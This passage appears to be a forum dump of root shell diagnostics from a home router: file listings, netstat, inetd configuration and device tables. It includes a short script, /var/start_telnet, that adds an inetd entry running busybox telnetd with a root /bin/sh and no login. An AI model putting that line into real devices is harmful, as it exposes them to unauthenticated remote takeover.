    drwxr-xr-x    2 root     root            60 Jan  1 01:07 tam
    drwxrwxrwx    5 root     root          1700 Jan  1 01:07 tmp
    -rw-r--r--    1 root     root            32 Jan  1 01:00 umtscfg-crwlock
    -rw-r--r--    1 root     root            32 Jan  1 01:00 umtsstat-crwlock
    -rw-r--r--    1 root     root            32 Jan  1 01:00 voipd_statsimple-crwlock
    lrwxrwxrwx    1 root     root            16 Jan  1 01:00 web_activity -> run/cpufreq.kick
    drwxr-xr-x    2 root     root            40 Jan 25  2017 wpa2 
    /usr/bin:
    Code:
    drwxr-xr-x    2 root     root          1595 Jan 25  2017 .
    drwxr-xr-x   10 root     root           166 Jan 25  2017 ..
    -rwxrwxrwx    1 root     root          6020 Jan 25  2017 access_check
    -rwxrwxrwx    1 root     root        301552 Jan 25  2017 aha
    -rwxrwxrwx    1 root     root         40860 Jan 25  2017 ahamailer
    -rwxrwxrwx    1 root     root         87988 Jan 25  2017 audiod
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 basename -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         16416 Jan 25  2017 boxnotifyd
    -rwxrwxrwx    1 root     root         60408 Jan 25  2017 bspatch
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 bunzip2 -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 bzcat -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 bzip2 -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         16748 Jan 25  2017 capiotcp_server
    -rwxrwxrwx    1 root     root          4008 Jan 25  2017 checkempty
    -rwxrwxrwx    1 root     root            74 Jan 25  2017 checkperformance
    lrwxrwxrwx    1 root     root             3 Jan 25  2017 classcfg -> cli
    -rwxrwxrwx    1 root     root         78332 Jan 25  2017 cli
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 cmp -> ../../bin/busybox
    -r-xr-xr-x    1 root     root         53504 Jan 25  2017 csvd
    -rwxrwxrwx    1 root     root         61196 Jan 25  2017 ctlmgr
    -rwxrwxrwx    1 root     root         12440 Jan 25  2017 ctlmgr_ctl
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 cut -> ../../bin/busybox
    -rwxrwxrwx    1 root     root          5863 Jan 25  2017 dect_bg_image_conversion.sh
    -rwxrwxrwx    1 root     root         10917 Jan 25  2017 dect_doorline_image_conversion.sh
    -rwxrwxrwx    1 root     root       1227988 Jan 25  2017 dect_manager
    -rwxrwxrwx    1 root     root          4688 Jan 25  2017 dect_ringtone_conversion.sh
    -rwxrwxrwx    1 root     root         14624 Jan 25  2017 dhrystone
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 dirname -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           542 Jan 25  2017 docsis_lifetest.sh
    -rwxrwxrwx    1 root     root        198460 Jan 25  2017 dtrace
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 du -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 env -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         45244 Jan 25  2017 envsubst
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 expr -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         41928 Jan 25  2017 faxd
    -rwxrwxrwx    1 root     root           531 Jan 25  2017 finalize.sh
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 find -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 free -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 ftpget -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 ftpput -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         37816 Jan 25  2017 gcalupd
    -rwxrwxrwx    1 root     root         16740 Jan 25  2017 httpsdl
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 id -> ../../bin/busybox
    lrwxrwxrwx    1 root     root             3 Jan 25  2017 ifcfg -> cli
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 killall -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           542 Jan 25  2017 library.sh
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 logname -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           542 Jan 25  2017 lte_lifetest.sh
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 md5sum -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           136 Jan 25  2017 mkconfigfile
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 mkfifo -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           811 Jan 25  2017 moh_upload
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 nohup -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 nslookup -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           163 Jan 25  2017 nvi
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 passwd -> ../../bin/busybox
    -rwxrwxrwx    1 root     root        105364 Jan 25  2017 pbd
    -rwxrwxrwx    1 root     root          2094 Jan 25  2017 pbd_upload_image
    -rwxrwxrwx    1 root     root          2743 Jan 25  2017 pbd_upload_ringtone
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 printf -> ../../bin/busybox
    lrwxrwxrwx    1 root     root             3 Jan 25  2017 qcfg -> cli
    lrwxrwxrwx    1 root     root             3 Jan 25  2017 qoscfg -> cli
    -rwxrwxrwx    1 root     root        277900 Jan 25  2017 qosd
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 readlink -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 realpath -> ../../bin/busybox
    -rwxrwxrwx    1 root     root          8144 Jan 25  2017 renice
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 reset -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           391 Jan 25  2017 resettam
    -rwxrwxrwx    1 root     root        102260 Jan 25  2017 sadc
    -rwxrwxrwx    1 root     root        218448 Jan 25  2017 sadf
    -rwxrwxrwx    1 root     root        117984 Jan 25  2017 sar
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 seq -> ../../bin/busybox
    -rwxrwxrwx    1 root     root          2160 Jan 25  2017 setcountry
    -rwxrwxrwx    1 root     root           575 Jan 25  2017 setlanguage
    -rwxrwxrwx    1 root     root          9868 Jan 25  2017 showportsopentolan
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 sort -> ../../bin/busybox
    -rwxrwxrwx    1 root     root           944 Jan 25  2017 strace-log-merge
    -rwxrwxrwx    1 root     root        268152 Jan 25  2017 switch_cli
    -rwxrwxrwx    1 root     root          1139 Jan 25  2017 system_status
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 tail -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         19708 Jan 25  2017 tam_play
    -rwxrwxrwx    1 root     root           752 Jan 25  2017 tam_upload_voice_prompt
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 taskset -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 tee -> ../../bin/busybox
    -rwxrwxrwx    1 root     root        640056 Jan 25  2017 telefon
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 test -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 tftp -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 time -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 top -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 tr -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         25912 Jan 25  2017 tr069fwupdate
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 traceroute -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 tty -> ../../bin/busybox
    -r-xr-xr-x    1 root     root         70696 Jan 25  2017 umtsd
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 uniq -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 unzip -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 uptime -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 wc -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 wget -> ../../bin/busybox
    -rwxrwxrwx    1 root     root          2672 Jan 25  2017 wlan_lifetest.sh
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 xargs -> ../../bin/busybox 
    /usr/sbin:
    Code:
    drwxr-xr-x    2 root     root           442 Jan 25  2017 .
    drwxr-xr-x   10 root     root           166 Jan 25  2017 ..
    -rwxrwxrwx    1 root     root         78044 Jan 25  2017 blkid
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 brctl -> ../../bin/busybox
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 chroot -> ../../bin/busybox
    -rwxrwxrwx    1 root     root        383024 Jan 25  2017 dsl_control
    -rwxrwxrwx    1 root     root          7012 Jan 25  2017 dsl_fw_sym_reader
    -rwxrwxrwx    1 root     root          4620 Jan 25  2017 dsl_isp_tool
    -rwxrwxrwx    1 root     root        163332 Jan 25  2017 dsl_monitor
    -r-xr-xr-x    1 root     root           589 Jan 25  2017 dsl_pipe
    -rwxrwxrwx    1 root     root         47889 Jan 25  2017 eth_oam
    -rwxrwxrwx    1 root     root         32172 Jan 25  2017 flash_erase
    lrwxrwxrwx    1 root     root            17 Jan 25  2017 inetd -> ../../bin/busybox
    -rwxrwxrwx    1 root     root         39424 Jan 25  2017 nanddump
    -rwxrwxrwx    1 root     root         57909 Jan 25  2017 oamd
    -rwxrwxrwx    1 root     root         10188 Jan 25  2017 readchip
    -rwxrwxrwx    1 root     root         22256 Jan 25  2017 ubiattach
    -rwxrwxrwx    1 root     root         14676 Jan 25  2017 ubiblock
    -rwxrwxrwx    1 root     root          6544 Jan 25  2017 ubicrc32
    -rwxrwxrwx    1 root     root         16352 Jan 25  2017 ubidetach
    -rwxrwxrwx    1 root     root         67572 Jan 25  2017 ubiformat
    -rwxrwxrwx    1 root     root         25512 Jan 25  2017 ubimkvol
    -rwxrwxrwx    1 root     root         28772 Jan 25  2017 ubinfo
    -rwxrwxrwx    1 root     root         38812 Jan 25  2017 ubinize
    -rwxrwxrwx    1 root     root         18068 Jan 25  2017 ubirename
    -rwxrwxrwx    1 root     root         20000 Jan 25  2017 ubirmvol
    -rwxrwxrwx    1 root     root         22184 Jan 25  2017 ubirsvol
    -rwxrwxrwx    1 root     root         20128 Jan 25  2017 ubiupdatevol 
    netstat:
    Code:
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       
    tcp        0      0 127.0.0.1:1011          127.0.0.1:35569         FIN_WAIT2   
    tcp        0      0 192.168.188.1:54707     192.168.188.20:54963    TIME_WAIT   
    tcp        1      0 127.0.0.1:35569         127.0.0.1:1011          CLOSE_WAIT  
    tcp        0      0 :::80                   :::*                    LISTEN      
    tcp        0      0 :::51121                :::*                    LISTEN      
    tcp        0      0 :::53                   :::*                    LISTEN      
    tcp        0      0 :::8182                 :::*                    LISTEN      
    tcp        0      0 :::8183                 :::*                    LISTEN      
    tcp        0      0 :::8184                 :::*                    LISTEN      
    tcp        0      0 :::8185                 :::*                    LISTEN      
    tcp        0      0 :::8186                 :::*                    LISTEN      
    tcp        0      0 :::443                  :::*                    LISTEN      
    tcp        0      0 ::ffff:192.168.188.1:21 ::ffff:192.168.188.20:54961 FIN_WAIT2   
    tcp        0      0 ::ffff:192.168.188.1:49443 ::ffff:192.168.188.20:54964 FIN_WAIT2   
    udp        0      0 0.0.0.0:67              0.0.0.0:*                           
    udp        0      0 192.168.188.1:1900      0.0.0.0:*                           
    udp        0      0 0.0.0.0:1900            0.0.0.0:*                           
    udp        0      0 192.168.188.1:34559     0.0.0.0:*                           
    udp        0      0 :::53                   :::*                                
    udp        0      0 fe80::e228:6dff:fe9b:f78e:1900 :::*                                
    udp        0      0 :::1900                 :::*                                
    udp        0      0 :::60305                :::*                                
    udp        0      0 fe80::e228:6dff:fe9b:f78e:47009 :::*                                
    udp        0      0 :::52138                :::*                                
    udp        0      0 :::5351                 :::*                                
    udp        0      0 :::5353                 :::*                                
    udp        0      0 :::5353                 :::*                                
    udp        0      0 :::5355                 :::*                                
    udp        0      0 :::5355                 :::*                                
    udp        0      0 :::38903                :::*                                
    udp        0      0 :::36347                :::*                                
    raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
    raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
    raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
    raw        0      0 0.0.0.0:2               0.0.0.0:*               2           
    Active UNIX domain sockets (servers and established)
    Proto RefCnt Flags       Type       State         I-Node Path
    unix  2      [ ]         DGRAM                      5119 /var/tmp/wland_lbd_response
    unix  2      [ ]         DGRAM                      5121 /var/tmp/wland_lbd_events
    unix  2      [ ACC ]     SEQPACKET  LISTENING        262 /dev/.udev/control
    unix  2      [ ]         DGRAM                      2328 /var/tmp/me_TR064.ctl
    unix  2      [ ]         DGRAM                      2330 /var/tmp/me_tr064srv.ctl
    unix  2      [ ACC ]     STREAM     LISTENING       5411 /var/tmp/wlancsi_listener_71977b11310399fc5374.socket
    unix  2      [ ]         DGRAM                      3365 /var/tmp/me_dsld.ctl
    unix  2      [ ]         DGRAM                      1873 /var/tmp/me_l2tpv3d.ctl
    unix  2      [ ]         DGRAM                       856 /var/tmp/me_multid.ctl
    unix  2      [ ]         DGRAM                       861 /var/tmp/me_upnpfboxdesc.ctl
    unix  2      [ ]         DGRAM                      1893 /var/tmp/me_ctlmgr-pcp-1812.ctl
    unix  2      [ ]         DGRAM                      2925 /var/run/hostapd/ath1
    unix  2      [ ]         DGRAM                      1902 /var/tmp/me__anony1817-2007732072.ctl
    unix  2      [ ]         DGRAM                      1904 /var/tmp/me_ctlmgr.ctl
    unix  2      [ ]         DGRAM                      2161 /var/tmp/me_pcpd.ctl
    unix  2      [ ]         DGRAM                      2164 /var/tmp/me_pcpd-pcp-1890.ctl
    unix  2      [ ]         DGRAM                      4726 /var/run/hostapd/global
    unix  2      [ ]         DGRAM                      1910 /var/tmp/me_dsl_remote_mgmt_kpi.ctl
    unix  2      [ ]         DGRAM                      4732 /var/run/wpa_supplicant/global
    unix  2      [ ACC ]     STREAM     LISTENING       3716 /var/rpc/timer_if
    unix  2      [ ]         DGRAM                      2189 /var/tmp/me_upnp_usb.ctl
    unix  2      [ ]         DGRAM                      2191 /var/tmp/me_kpi_name_receiver.ctl
    unix  2      [ ]         DGRAM                      1936 /var/tmp/me_L2TPV3.ctl
    unix  2      [ ACC ]     STREAM     LISTENING       4497 /var/tmp/boxnotify
    unix  2      [ ]         DGRAM                      4499 /var/tmp/notifyd_msg
    unix  2      [ ]         DGRAM                       925 /var/tmp/me_multid-pcp-1831.ctl
    unix  2      [ ]         DGRAM                      3234 /var/tmp/me_upnpdevd.ctl
    unix  2      [ ]         DGRAM                      2988 /var/run/hostapd/guest5
    unix  3      [ ]         DGRAM                      2736 /var/tmp/wland_lbd_ctrl_socket
    unix  3      [ ]         DGRAM                      2738 /var/tmp/lbd_requests
    unix  2      [ ]         DGRAM                      4801 /var/run/hostapd/ath0
    unix  2      [ ]         DGRAM                      3268 /var/tmp/me_libgsm.ctl
    unix  2      [ ]         DGRAM                      2503 /var/tmp/me_igd.ctl
    unix  2      [ ]         DGRAM                      2505 /var/tmp/me_igd2.ctl
    unix  2      [ ]         DGRAM                      3275 /var/tmp/me_dsld-pcp-1906.ctl
    unix  2      [ ]         DGRAM                       474 /var/tmp/me_remote.ctl
    unix  2      [ ACC ]     STREAM     LISTENING       3548 /tmp/plc_sock_if
    unix  2      [ ]         DGRAM                       476 /var/tmp/me_avmipc_state.ctl
    unix  2      [ ACC ]     STREAM     LISTENING       3554 /var/tmp/wlancsi_async.socket
    unix  2      [ ]         DGRAM                      2794 /var/run/hostapd/guest4
    unix  2      [ ]         DGRAM                      3566 /var/tmp/me_logic.ctl
    unix  3      [ ]         DGRAM                       270 
    unix  2      [ ]         STREAM     CONNECTED       4187 
    unix  3      [ ]         STREAM     CONNECTED       4613 /var/tmp/boxnotify
    unix  3      [ ]         STREAM     CONNECTED       6228 
    unix  3      [ ]         STREAM     CONNECTED       5410 
    unix  2      [ ]         STREAM     CONNECTED       4186 
    unix  3      [ ]         STREAM     CONNECTED       5516 /var/tmp/wlancsi_listener_71977b11310399fc5374.socket
    unix  3      [ ]         STREAM     CONNECTED       4612 
    unix  3      [ ]         STREAM     CONNECTED       4615 /var/tmp/boxnotify
    unix  3      [ ]         STREAM     CONNECTED       3967 /var/rpc/timer_if
    unix  3      [ ]         DGRAM                       269 
    unix  3      [ ]         STREAM     CONNECTED       4614 
    unix  3      [ ]         STREAM     CONNECTED       6227 /var/tmp/wlancsi_async.socket
    unix  3      [ ]         STREAM     CONNECTED       3966  
    /var/tmp/inetd.conf:
    Code:
    21 stream tcp6 nowait.30 root /bin/sh sh /bin/inetdftp
    139 stream tcp6 nowait root /sbin/smbd smbd
    445 stream tcp6 nowait root /sbin/smbd smbd 
    /var/start_telnet:
    Code:
    umount /usr/sbin 2>/dev/null
    rm -r /var/usrsbin 2>/dev/null
    cp -a /usr/sbin /var/usrsbin
    mount /var/usrsbin /usr/sbin -o bind
    ln -s ../../bin/busybox /usr/sbin/telnetd
    sed -e '/^23 /d' -e '$a23 stream tcp6 nowait root /bin/busybox telnetd -l /bin/sh -i -K' /var/tmp/inetd.conf >/var/tmp/inetd.conf.new && mv /var/tmp/inetd.conf.new /var/tmp/inetd.conf && kill -HUP $(pidof inetd)
    echo "Telnet support initialized" 
    id:
    Code:
    uid=0(root) gid=0(root)
    /proc/devices:
    Code:
    Character devices:
      1 mem
      5 /dev/tty
      5 /dev/console
      5 /dev/ptmx
     10 misc
     68 capi_oslib
     81 switch_api
     89 i2c
     90 mtd
    108 ppp
    128 ptm
    136 pts
    180 usb
    181 ppa
    189 usb_device
    230 spdmon
    232 wlan_eeprom
    233 userman_url
    234 kdsldptrace
    235 kdsld_misc
    236 kdsld_traffic
    237 kdsld_user
    238 kdsld
    241 dect_io
    242 sysrst
    243 led
    244 ubi0
    245 tffs
    246 ltq_icc
    247 ltq_mps2
    248 debug
    249 avm_event
    250 watchdog
    251 avm_power
    252 avm_net_trace
    253 ttyLTQ
    254 rtc
    
    
    Block devices:
    259 blkext
      7 loop
      8 sd
     31 mtdblock
     65 sd
     66 sd
     67 sd
     68 sd
     69 sd
     70 sd
     71 sd
    128 sd
    129 sd
    130 sd
    131 sd
    132 sd
    133 sd
    134 sd
    135 sd
    254 zram 
    sed -ne 's|^[ ]*\([0-9]*\)[ \t]tffs.*$|\1|p' /proc/devices:
    Code:
    245